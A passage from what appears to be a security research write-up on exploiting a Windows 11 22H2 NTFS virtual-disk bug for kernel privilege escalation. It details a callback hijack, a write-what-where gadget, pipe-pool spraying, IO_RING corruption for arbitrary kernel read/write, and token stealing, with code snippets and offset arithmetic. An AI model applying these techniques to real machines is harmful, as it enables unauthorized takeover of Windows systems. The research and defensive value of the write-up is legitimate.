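/* Returns the key of the matching node, or -1 when nothing matches. */
static int demo_lookup(int key)
{
    TABLE table = { { NULL, NULL, &g_root.Links, 0 }, 3, compare_int };
    LINKS *hit = find_node(&table, &key);
    return hit ? ((INT_NODE *)hit)->Key : -1;
}
```

The point of the model is that the table pointer, the callback pointer, and the first node pointer all come from the table itself, so whoever controls the table memory chooses the function that is called and two of its three arguments.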

That puts us at a crossroads:

- We could go for code execution in the kernel using a technique that bypasses kCFG and/or HVCI. For instance, we could use the beautiful code-reuse technique published by slowerzs in a blog post, which bypasses kCFG and HVCI and even enables arbitrary ROP/JOP.

- Or we could reuse Windows kernel code to get a write-what-where and build a data-only exploit.

For the sake of research, we choose the second path.



According to the control flow of nt!RtlDeleteElementGenericTableAvl, the first controlled indirect call is CompareRoutine, which takes three arguments. We control the pointer and content of arguments 1 and 3. The second argument is a stack pointer, and we control only the value it points to.

After a quick sweep through ntoskrnl, I found a suitable gadget: nt!RtlpFcBufferManagerReferenceBuffers. This function aligns perfectly with our control capabilities:

__int64 __fastcall RtlpFcBufferManagerReferenceBuffers(__int64 TablePtr, __int64 Buffer, __int64 RightChild_1) {

RtlpFcEnterRegion();

v5 = (unsigned int)RtlAcquireSwapReference((__int64 *)TablePtr);

result = *(_QWORD *)(TablePtr + 8 * v5 + 168);

*v7 = result;

*(_QWORD *)RightChild_1 = TablePtr + 8 * (v5 + 8 * v5 + 3);

return result;

}

We’ll use this function to perform a kernel write-what-where. See the figure below to understand how this works:

After the function returns, we must satisfy certain conditions to avoid a crash, but this is not very important, and I believe the reader can satisfy them without any problems.
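The address arithmetic behind this write-what-where can be sketched in a few lines. This is a user-mode calculation only, with hypothetical helper names; `v5` is treated as an input because its value comes from RtlAcquireSwapReference, and the 0x20 constant is sizeof(_RTL_BALANCED_LINKS) from the layout shown earlier.

```c
#include <assert.h>
#include <stdint.h>

#define BALANCED_LINKS_SIZE 0x20u /* sizeof(_RTL_BALANCED_LINKS) */

/* Offset of the qword the gadget reads from the table: 8 * v5 + 168. */
static uint64_t gadget_read_offset(uint64_t v5)
{
    return 8 * v5 + 168;
}

/* Value stored through the third argument:
   TablePtr + 8 * (v5 + 8 * v5 + 3), i.e. TablePtr + 72 * v5 + 24. */
static uint64_t gadget_written_value(uint64_t table_ptr, uint64_t v5)
{
    return table_ptr + 8 * (v5 + 8 * v5 + 3);
}

/* CompareRoutine receives &RightChild[1], i.e. RightChild + 0x20, as its
   third argument. For the store to land on `target`, the fake RightChild
   pointer therefore has to be target - 0x20. */
static uint64_t right_child_for_target(uint64_t target)
{
    assert(target >= BALANCED_LINKS_SIZE);
    return target - BALANCED_LINKS_SIZE;
}
```

In other words, the "where" is chosen through the fake BalancedRoot.RightChild pointer, and the "what" is always an address a fixed distance into the fake table.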

Next question: How do we allocate memory that’s accessible from the thread mounting the NTFS volume?

At first, you might think of using VirtualAlloc and writing the pointer into the NTFS image. But that won’t work. The thread mounting the NTFS volume runs in the System process, and user-mode memory from the exploit process isn’t mapped there. Even if it were, mitigations like SMEP/SMAP and HVCI would block access. All of these mitigations force exploit developers either to design their exploits around them or to find bypasses.

We will use the classic way to control kernel-mode memory: pipes. Some key points about this method:

- DATA_ENTRY structures are allocated in the nonpaged pool and are thus accessible to NTFS code in kernel context.

- The allocated addresses can be leaked via NtQuerySystemInformation. This restricts the exploit to Medium IL or higher. On Windows 11 24H2, leaking addresses via this API requires SeDebugPrivilege, which limits the impact to Admin → Kernel. But our target is Windows 11 22H2, so we’re fine.

- Once data has been written into a pipe, it cannot be changed. Any subsequent write into the pipe leads to the allocation of a new chunk in the big pool.

- The size of the DATA_ENTRY header is 48 bytes.
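The 48-byte header matters whenever a leaked chunk address has to be turned into the address of the controlled bytes. The sketch below shows that bookkeeping with hypothetical helper names. It assumes the header sits at the very start of the leaked allocation, which should be verified on the target build.

```c
#include <assert.h>
#include <stdint.h>

#define DATA_ENTRY_HEADER_SIZE 48u /* header size stated in the text */

/* Pool allocation size needed to hold `payload_size` bytes of pipe data. */
static uint64_t pipe_chunk_size(uint64_t payload_size)
{
    return DATA_ENTRY_HEADER_SIZE + payload_size;
}

/* Payload size to write so that the whole chunk has the chosen size. */
static uint64_t payload_size_for_chunk(uint64_t chunk_size)
{
    assert(chunk_size > DATA_ENTRY_HEADER_SIZE);
    return chunk_size - DATA_ENTRY_HEADER_SIZE;
}

/* Kernel address of the first controlled byte, given a leaked chunk
   address (assumption: the header starts at the chunk address). */
static uint64_t pipe_payload_address(uint64_t leaked_chunk_address)
{
    return leaked_chunk_address + DATA_ENTRY_HEADER_SIZE;
}
```

Every pointer stored inside the fake structures would be computed this way, from a leaked chunk address plus the header size plus an offset into the payload.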

And the last thing that should be clarified is:

- What read and write primitives do we want to use to achieve arbitrary kernel read and write?

To gain arbitrary kernel memory access, we’ll use the IO_RING primitive, detailed extensively by Yarden Shafir here and here. If you don’t know about IO_RINGs and how they can be used for exploitation, now is the right time to check this out.

Here’s the key layout of the IO_RING object:

0: kd> dt nt!_IORING_OBJECT

+0x000 Type : Int2B

+0x002 Size : Int2B

+0x008 UserInfo : _NT_IORING_INFO

+0x038 Section : Ptr64 Void

+0x040 SubmissionQueue : Ptr64 _NT_IORING_SUBMISSION_QUEUE

+0x048 CompletionQueueMdl : Ptr64 _MDL

+0x050 CompletionQueue : Ptr64 _NT_IORING_COMPLETION_QUEUE

+0x058 ViewSize : Uint8B

+0x060 InSubmit : Int4B

+0x068 CompletionLock : Uint8B

+0x070 SubmitCount : Uint8B

+0x078 CompletionCount : Uint8B

+0x080 CompletionWaitUntil : Uint8B

+0x088 CompletionEvent : _KEVENT

+0x0a0 SignalCompletionEvent : UChar

+0x0a8 CompletionUserEvent : Ptr64 _KEVENT

+0x0b0 RegBuffersCount : Uint4B

+0x0b8 RegBuffers : Ptr64 Ptr64 _IOP_MC_BUFFER_ENTRY

+0x0c0 RegFilesCount : Uint4B

+0x0c8 RegFiles : Ptr64 Ptr64 Void

RtlpFcBufferManagerReferenceBuffers allows us to overwrite a pointer. To exploit IO_RING, we need control over both RegBuffers and RegBuffersCount. Since the gadget gives us only a pointer write, we must first initialize an IO_RING instance with at least one registered buffer, so that RegBuffersCount is already non-zero, and then overwrite the RegBuffers pointer.

Combining the initial write-what-where with our intention to overwrite RegBuffers, RegBuffers will be set to TablePtr + 8 * (v5 + 8 * v5 + 3), where TablePtr points into controllable pipe memory that resides in the kernel. In other words, RegBuffers will point somewhere into the controllable content of the pipe, so we must prepare a fake array of _IOP_MC_BUFFER_ENTRY there before exploitation starts. Fortunately, this is quite easy, because here we can use user-mode memory.

We can use user-mode memory here because the reads and writes to it happen in the context of the exploit process, where that is OK.

Yes, if SMAP is enabled, it blocks access to user-mode memory from the kernel, but we could keep using big pools instead and everything would still work. For simplicity, this write-up does not include a SMAP bypass, to keep everything as easy to understand as possible.



See the figure below to understand how exploit logic works:

Now we have all the information required to build our exploit:

- Initialize the IO_RING_OBJECT via CreateIoRing and initialize the pre-registered buffers via BuildIoRingRegisterBuffers/SubmitIoRing.

- Initialize the fake structures. We use 5 different big pools:

  - FakeSCB

  - FakeFCB

  - FakeOAT

  - FakeVCB

  - FakeShared. This is special data used as storage shared across multiple fake structures. Here we allocate the various ERESOURCE, KMUTEX, KEVENT, and other utility structures that push the control flow forward or stabilize it.

- Generate VHD

- Mount VHD

- Execute any arbitrary kernel R/W elevation payload. We will use Token stealing of course 🙂

See the figure below to understand how the fake structures are initialized by the exploit:

Conclusions

The Windows attack surface still hides many forgotten “weird machines” — subsystems with long histories, limited auditing, and complex legacy logic. These machines can be exposed through non-obvious vectors. In this article, we showcased exploitation of one such target: the NTFS implementation, specifically through the Virtual Disks subsystem.

This case demonstrates how seemingly innocuous components like transaction logs can lead to powerful exploitation primitives, even in modern versions of Windows.

There are several areas where the exploit could be refined:

- Controlled Out-of-Memory (OOM) Triggering

  Currently, the exploit relies on an uncontrolled OOM condition. A more reliable strategy would involve carefully exhausting memory to trigger deterministic failures. Alternatively, it might be possible to force ntfs!NtfsMountVolume to raise a different exception from a more favorable code path.

- SMAP Awareness or Bypass

  The current version doesn’t respect SMAP. Adding SMAP-safe techniques or implementing a proper bypass would make the exploit more robust on hardened systems.

- Preventing Early BugChecks

  Occasionally, a #PF (page fault) is triggered on completely unmapped pages, causing a BugCheck inside nt!memcpy, which is called from ntfs!InitializeRestartState. This prevents the flow from reaching ntfs!NtfsCloseAttributesFromRestart. Introducing a memory exhaustion strategy might help mitigate this issue and improve stability.

That’s all, friends. Go deeper, stay curious, and happy hunting.

Feel free to share your thoughts about the write-up on our X page. Follow @ptswarm or @immortalp0ny (or reach out to me on Telegram) so you don’t miss our future research and other publications.